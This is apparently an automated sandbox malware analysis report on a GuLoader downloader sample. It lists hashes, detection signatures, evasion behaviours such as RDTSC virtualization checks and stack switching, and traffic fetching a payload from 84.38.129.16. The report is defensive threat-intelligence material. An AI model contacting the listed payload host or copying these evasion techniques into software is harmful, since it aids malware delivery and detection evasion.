Edit tour

Windows Analysis Report
ODjwCjQBAP.exe

Overview

General Information

Sample name:	ODjwCjQBAP.exe renamed because original name is a hash value
Original sample name:	c10aac838dd326d74fcc69eeae41117036ac26b858285fa0da034cba44762f7a.exe
Analysis ID:	1569269
MD5:	2b78431a8969c829339ed0da29004757
SHA1:	c09051c5f433348c6cf5b5c0781af877f44212d2
SHA256:	c10aac838dd326d74fcc69eeae41117036ac26b858285fa0da034cba44762f7a
Tags:	exeuser-adrian__luca
Infos:

Detection

GuLoader

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected GuLoader

AI detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

ODjwCjQBAP.exe (PID: 5028 cmdline: "C:\Users\user\Desktop\ODjwCjQBAP.exe" MD5: 2B78431A8969C829339ED0DA29004757)

ODjwCjQBAP.exe (PID: 6180 cmdline: "C:\Users\user\Desktop\ODjwCjQBAP.exe" MD5: 2B78431A8969C829339ED0DA29004757)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.3304110338.00000000017C7000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000000.00000002.2306343493.0000000005427000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T17:08:16.529468+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	49949	84.38.129.16	80	TCP
2024-12-05T17:09:18.678508+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	49747	84.38.129.16	80	TCP
2024-12-05T17:09:40.804027+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	49799	84.38.129.16	80	TCP
2024-12-05T17:10:02.944950+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	49848	84.38.129.16	80	TCP
2024-12-05T17:10:25.104715+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	49898	84.38.129.16	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ODjwCjQBAP.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: ODjwCjQBAP.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: ODjwCjQBAP.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 0_2_0040270B FindFirstFileA,	0_2_0040270B
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 0_2_004061FB FindFirstFileA,FindClose,	0_2_004061FB
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 0_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405799
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 3_2_0040270B FindFirstFileA,	3_2_0040270B
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 3_2_004061FB FindFirstFileA,FindClose,	3_2_004061FB
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 3_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	3_2_00405799

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49747 -> 84.38.129.16:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49799 -> 84.38.129.16:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49848 -> 84.38.129.16:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49898 -> 84.38.129.16:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49949 -> 84.38.129.16:80

Source: global traffic	HTTP traffic detected: GET /uvsMrbCwSaj148.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.129.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uvsMrbCwSaj148.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.129.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uvsMrbCwSaj148.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.129.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uvsMrbCwSaj148.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.129.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uvsMrbCwSaj148.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.129.16Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.129.16

Source: global traffic	HTTP traffic detected: GET /uvsMrbCwSaj148.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.129.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uvsMrbCwSaj148.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.129.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uvsMrbCwSaj148.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.129.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uvsMrbCwSaj148.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.129.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uvsMrbCwSaj148.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.129.16Cache-Control: no-cache

Source: ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, ODjwCjQBAP.exe, 00000003.00000002.3305277495.00000000042C0000.00000004.00001000.00020000.00000000.sdmp, ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026FC000.00000004.00000020.00020000.00000000.sdmp, ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.38.129.16/uvsMrbCwSaj148.bin
Source: ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.38.129.16/uvsMrbCwSaj148.bin%
Source: ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.38.129.16/uvsMrbCwSaj148.bin)
Source: ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.38.129.16/uvsMrbCwSaj148.bin1
Source: ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.38.129.16/uvsMrbCwSaj148.bin2BY
Source: ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.38.129.16/uvsMrbCwSaj148.binMO
Source: ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.38.129.16/uvsMrbCwSaj148.binS
Source: ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.38.129.16/uvsMrbCwSaj148.binSBx
Source: ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.38.129.16/uvsMrbCwSaj148.binV
Source: ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.38.129.16/uvsMrbCwSaj148.binjB1
Source: ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.38.129.16/uvsMrbCwSaj148.bink
Source: ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.38.129.16/uvsMrbCwSaj148.binm32
Source: ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.38.129.16/uvsMrbCwSaj148.binxM
Source: ODjwCjQBAP.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: ODjwCjQBAP.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

Code function: 0_2_0040524E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040524E

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 0_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004032BF
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 3_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		3_2_004032BF

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

File created: C:\Windows\SysWOW64\lamellate.ini

Jump to behavior

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 0_2_00406542	0_2_00406542
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 0_2_00404A8D	0_2_00404A8D
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 3_2_00406542	3_2_00406542
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 3_2_00404A8D	3_2_00404A8D

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

Code function: String function: 00402ACE appears 52 times

Source: ODjwCjQBAP.exe

Static PE information: invalid certificate

Source: ODjwCjQBAP.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal68.troj.evad.winEXE@3/18@0/1

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 0_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004032BF
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 3_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		3_2_004032BF

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

Code function: 0_2_0040451A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040451A

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

Code function: 0_2_004020CD CoCreateInstance,MultiByteToWideChar,

0_2_004020CD

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously

Jump to behavior

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

File created: C:\Users\user\AppData\Local\Temp\nsr63E9.tmp

Jump to behavior

Source: ODjwCjQBAP.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ODjwCjQBAP.exe

ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

File read: C:\Users\user\Desktop\ODjwCjQBAP.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ODjwCjQBAP.exe "C:\Users\user\Desktop\ODjwCjQBAP.exe"
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Process created: C:\Users\user\Desktop\ODjwCjQBAP.exe "C:\Users\user\Desktop\ODjwCjQBAP.exe"
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Process created: C:\Users\user\Desktop\ODjwCjQBAP.exe "C:\Users\user\Desktop\ODjwCjQBAP.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

File written: C:\ProgramData\ankomstperrons.ini

Jump to behavior

Source: ODjwCjQBAP.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000003.00000002.3304110338.00000000017C7000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2306343493.0000000005427000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_10001A5D

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

Code function: 0_2_10002D20 push eax; ret

0_2_10002D4E

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

File created: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	API/Special instruction interceptor: Address: 5BC8751
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	API/Special instruction interceptor: Address: 1F68751

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	RDTSC instruction interceptor: First address: 5B6B7D8 second address: 5B6B7D8 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FA6C0F9BB1Fh 0x00000006 test bh, 0000001Ch 0x00000009 cmp al, cl 0x0000000b inc ebp 0x0000000c test dx, cx 0x0000000f inc ebx 0x00000010 cmp ch, FFFFFF80h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	RDTSC instruction interceptor: First address: 1F0B7D8 second address: 1F0B7D8 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FA6C0B1512Fh 0x00000006 test bh, 0000001Ch 0x00000009 cmp al, cl 0x0000000b inc ebp 0x0000000c test dx, cx 0x0000000f inc ebx 0x00000010 cmp ch, FFFFFF80h 0x00000013 rdtsc

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe TID: 6552

Thread sleep time: -40000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 0_2_0040270B FindFirstFileA,	0_2_0040270B
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 0_2_004061FB FindFirstFileA,FindClose,	0_2_004061FB
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 0_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405799
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 3_2_0040270B FindFirstFileA,	3_2_0040270B
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 3_2_004061FB FindFirstFileA,FindClose,	3_2_004061FB
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	Code function: 3_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	3_2_00405799

Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\ODjwCjQBAP.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: ODjwCjQBAP.exe, 00000003.00000002.3305009935.00000000026FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
